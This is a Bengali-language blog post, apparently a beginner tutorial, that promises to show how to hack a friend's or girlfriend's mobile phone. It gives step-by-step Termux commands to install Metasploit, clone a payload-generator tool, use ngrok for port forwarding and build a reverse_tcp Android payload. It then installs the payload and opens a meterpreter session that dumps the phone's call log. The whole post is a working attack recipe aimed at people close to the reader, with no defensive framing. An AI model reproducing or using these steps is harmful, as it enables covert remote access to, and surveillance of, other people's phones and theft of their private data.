আজ আমি আপনাদের সামনে নিয়ে আসলাম payload কিভাবে create করতে হয়। এবং বন্ধুর বা gf এর মধ্যে মোবাইল হ্যাক করুন। এটাকে আবার virus ও বলা হয়।
তারপর জন্য আমাদের দরকার হবে termux আর নেট কানেকশন।
প্রথমে আমরা চলে যাবো termux এ ।
এখন আমরা রান করবো pkg update -y লিখে ইন্টার ক্লিক করবো।
এখন python প্যাক ইনস্টাল করতে হবে। তারপর জন্য কমান্ড pkg install python
এখন আমাদের প্রয়োজন হবে git ইনস্টল করা। তার জন্য কমান্ড হলো pkg install git -y
এখন আমাদের termux থেকে বের হতে হবে তাই exit লিখে ইন্টার করবো। termux থেকে বের হবে যাবে। তারপর আবার termux ওপেন করতে হবে।
এখন আমাদের রান করতে হবে pkg install unstable-repo এই কমান্ড উপরে দেওয়া আছে।
এখন আমাদের খুব দরকারী একটা tools ইনস্টল করতে হবে। আর এই টুলস টা প্রায় ১৫০/২০০ মেগাবাইট এর মতো হবে। আর কিছু সময় লাগবে ইনস্টল হতে ১৫/২০ মিনিট এর মতো । ইনস্টল করার কমান্ড pkg install metasploit-y
এখন আমাদের payload or virus টুলসটা ইনস্টল করতে হবে । তার জন্য আমরা লিখবো
git clone https://github.com/D4Droid/viren
এখন ইন্টার ক্লিক করবো।
ইনস্টল হলে ls লিখে ইন্টার ক্লিক করবো।
এখন আমাদের viren টুলস এর ভিতরে যেতে হবে তার জন্য cd viren লিখে ইন্টার করবো।
এখন আমাদের প্রয়োজন হবে start.py মেইন ফাইলকে permission দেওয়া তার জন্য chmod 777 start.py লিখে ইন্টার ক্লিক করবো।
এখন ls লিখে ইন্টার ক্লিক করবো।
আর হ্যাঁ start.py permission পেলে গ্রীন কালার হয়ে যাবে। এখন আমাদের দরকার ngrok। ngrok ডাউনলোড unzip করে ngrok ফাইলটা স্টোরেজ মেমোরিতে রাখবেন । এখন আমাদের ngrok ফাইলটা viren টুলস এ আনতে হবে তার জন্য আমরা লিখবো cp /sdcard/ngrok /$HOME/viren লিখে ইন্টার ক্লিক করবো তারপর ls ক্লিক করবো।
এখন আমাদের ngrok কে permission দিতে হবে তার জন্য chmod 777 ngrok লিখে ইন্টার ক্লিক করবো।
Ngrok যদি permission পেয়ে যায় তাহলে গ্রীন কালার হয়ে যাবে । এখন আমাদের মেইন টুলস ওপেন করতে হবে মানে viren টুলস টা রান করতে হবে তার জন্য python start.py লিখে ইন্টার ক্লিক করবো।
দেখতে পাচ্ছেন আমার টুলস ওপের হয়ে গেছে। এখন আমরা payload বা virus তেরি করবো তার জন্য 1 লিখে ইন্টার ক্লিক করবো।
যেহেতু আমরা reverse_tcp ইনস্টল করবো তাই 1 লিখে ইন্টার ক্লিক করবো।
এখন আমাদের লোকাল আইপি দিতে হবে এই জন্য আমরা 127.0.0.1 লিখে ইন্টার ক্লিক করবো।
এখন port এর জন্য 4444 লিখে ইন্টার ক্লিক করবো।
এখন আমাদের দরকার আমরা কি নামে payload or virus তেরি করবো সেই নাম এখানে লিখবো ।
দেখতে পাচ্ছে আমার virus or payload তেরি হয়া গেছে এবং কোথায় আছে virus সেই ফোল্ডারের নাম দেওয়া আছে।
এখন আমরা Yes লিখে ইন্টার দিবো।
আবার ও yes লিখে ইন্টার দিবো ।
ইন্টার দেওয়ার পর এই রকম আসবে। এখন আমাদের দরকার virus or payload টা ইনস্টল করতে হবে।
এখন ইনস্টল করবো।
এই রকম ইন্টার পেইজ আসলে install always ক্লিক করবো ।
এখন আমরা ইনস্টল করা virus টা ওপেন করবো।
যখন আমি virus ওপর অক্মাইড করছি তখনই আমার ফোনের সকল access নিয়ে গেছে। termux এ দেখতে পাচ্ছেন meterpreter আসে পরছে।
Help লিখে ইন্টার করলে আমরা meterpreter কিছু কমান্ড দেখতে পাবো।
আমি dump_calllog লিখে ইন্টার ক্লিক করবে আমার ফোনের কলে যখ নাম্বার আছে সব গুলো দেখাবে।
আর হ্যাঁ এইটা যখন আমরা port forwarding করবো তখন যেই কোন ফোনে কাজ করবে। তার আগে কাজ করবে না।
এই আবার অন্য ভাবে ও করা যায় metasploit দিয়ে । যারা নতুন তাদের জন্য এই টা সহজ হবে তাই এইটা শেয়ার করলাম। লেখায় কোন ভুল হলে ক্ষমাদৃষ্টিতে দেখবেন।
No comments:
Post a Comment